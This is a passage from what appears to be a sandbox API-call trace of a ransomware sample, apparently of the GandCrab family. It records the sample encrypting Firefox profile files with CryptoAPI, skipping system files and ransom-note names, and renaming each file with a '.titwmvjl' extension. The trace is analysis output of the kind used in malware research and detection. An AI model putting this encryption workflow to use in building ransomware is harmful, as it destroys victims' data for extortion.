dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.006] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.007] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.007] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.007] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.007] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.007] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.010] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503378) returned 1 [0081.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.010] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.010] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.011] GetLastError () returned 0x0 [0081.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.011] CryptDestroyKey (hKey=0x503378) returned 1 [0081.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.011] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.011] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.014] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503638) returned 1 [0081.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.014] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.014] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.014] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.015] GetLastError () returned 0x0 [0081.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.015] CryptDestroyKey (hKey=0x503638) returned 1 [0081.015] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.015] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.015] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.015] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.015] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x137c, lpOverlapped=0x0) returned 1 [0081.027] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffec84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.027] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x137c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x137c, lpOverlapped=0x0) returned 1 [0081.031] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.031] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.032] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.036] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.036] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.037] CloseHandle (hObject=0x2ec) returned 1 [0081.038] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495592289365.f6bd7dec-4421-47ce-b829-1080689ec7ca.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.039] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.039] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.039] lstrcmpW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2=".") returned 1 [0081.039] lstrcmpW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="..") returned 1 [0081.039] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" [0081.039] lstrlenW (lpString=".titwmvjl") returned 9 [0081.039] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0081.039] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.039] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.titwmvjl") returned 183 [0081.040] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0081.040] lstrlenW (lpString=".jsonlz4") returned 8 [0081.040] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.040] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0081.040] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0081.040] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.040] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0081.040] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="desktop.ini") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="autorun.inf") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="iconcache.db") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="boot.ini") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="thumbs.db") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="ntldr") returned -1 [0081.040] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0081.041] lstrcmpiW (lpString1="1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0081.041] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4") returned 174 [0081.041] lstrlenW (lpString=".jsonlz4") returned 8 [0081.041] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.041] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".jsonlz4 ") returned 9 [0081.041] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.041] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.041] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0081.042] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.042] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0081.045] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.045] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.046] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.049] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.049] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.049] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.049] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0081.049] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.050] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.050] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.050] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.050] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0081.053] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0081.053] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0081.053] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0081.053] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0081.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.054] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.054] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.054] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.054] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.057] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503238) returned 1 [0081.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.057] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.057] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.058] GetLastError () returned 0x0 [0081.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.058] CryptDestroyKey (hKey=0x503238) returned 1 [0081.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.058] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.058] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.058] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0081.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.061] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503578) returned 1 [0081.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.061] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0081.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.061] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0081.062] GetLastError () returned 0x0 [0081.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.062] CryptDestroyKey (hKey=0x503578) returned 1 [0081.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0081.062] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0081.062] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0081.062] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0081.062] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x1407, lpOverlapped=0x0) returned 1 [0081.075] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffebf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.075] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1407, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x1407, lpOverlapped=0x0) returned 1 [0081.077] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.077] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0081.078] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.083] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.083] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.083] CloseHandle (hObject=0x2ec) returned 1 [0081.084] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495596278120.31e5ce24-c2bf-486b-b29e-534113b7c6dc.main.jsonlz4.titwmvjl"), dwFlags=0x1) returned 1 [0081.085] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.085] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0081.085] lstrcmpW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2=".") returned 1 [0081.085] lstrcmpW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="..") returned 1 [0081.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4" [0081.086] lstrlenW (lpString=".titwmvjl") returned 9 [0081.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0081.086] VirtualAlloc (lpAddress=0x0, dwSize=0x19c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0081.086] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4.titwmvjl") returned 183 [0081.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0081.086] lstrlenW (lpString=".jsonlz4") returned 8 [0081.086] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0081.086] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".jsonlz4 ") returned 9 [0081.086] lstrcmpiW (lpString1=".jsonlz4", lpString2=".titwmvjl") returned -1 [0081.086] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0081.086] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4") returned 174 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="desktop.ini") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="autorun.inf") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="iconcache.db") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="boot.ini") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="thumbs.db") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0081.086] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="CRAB-DECRYPT.html") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="ntldr") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0081.087] lstrcmpiW (lpString1="1495597242414.2e462298-aeda-4ee5-bf23-a73bdf74947f.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0081.087] lstrlenW 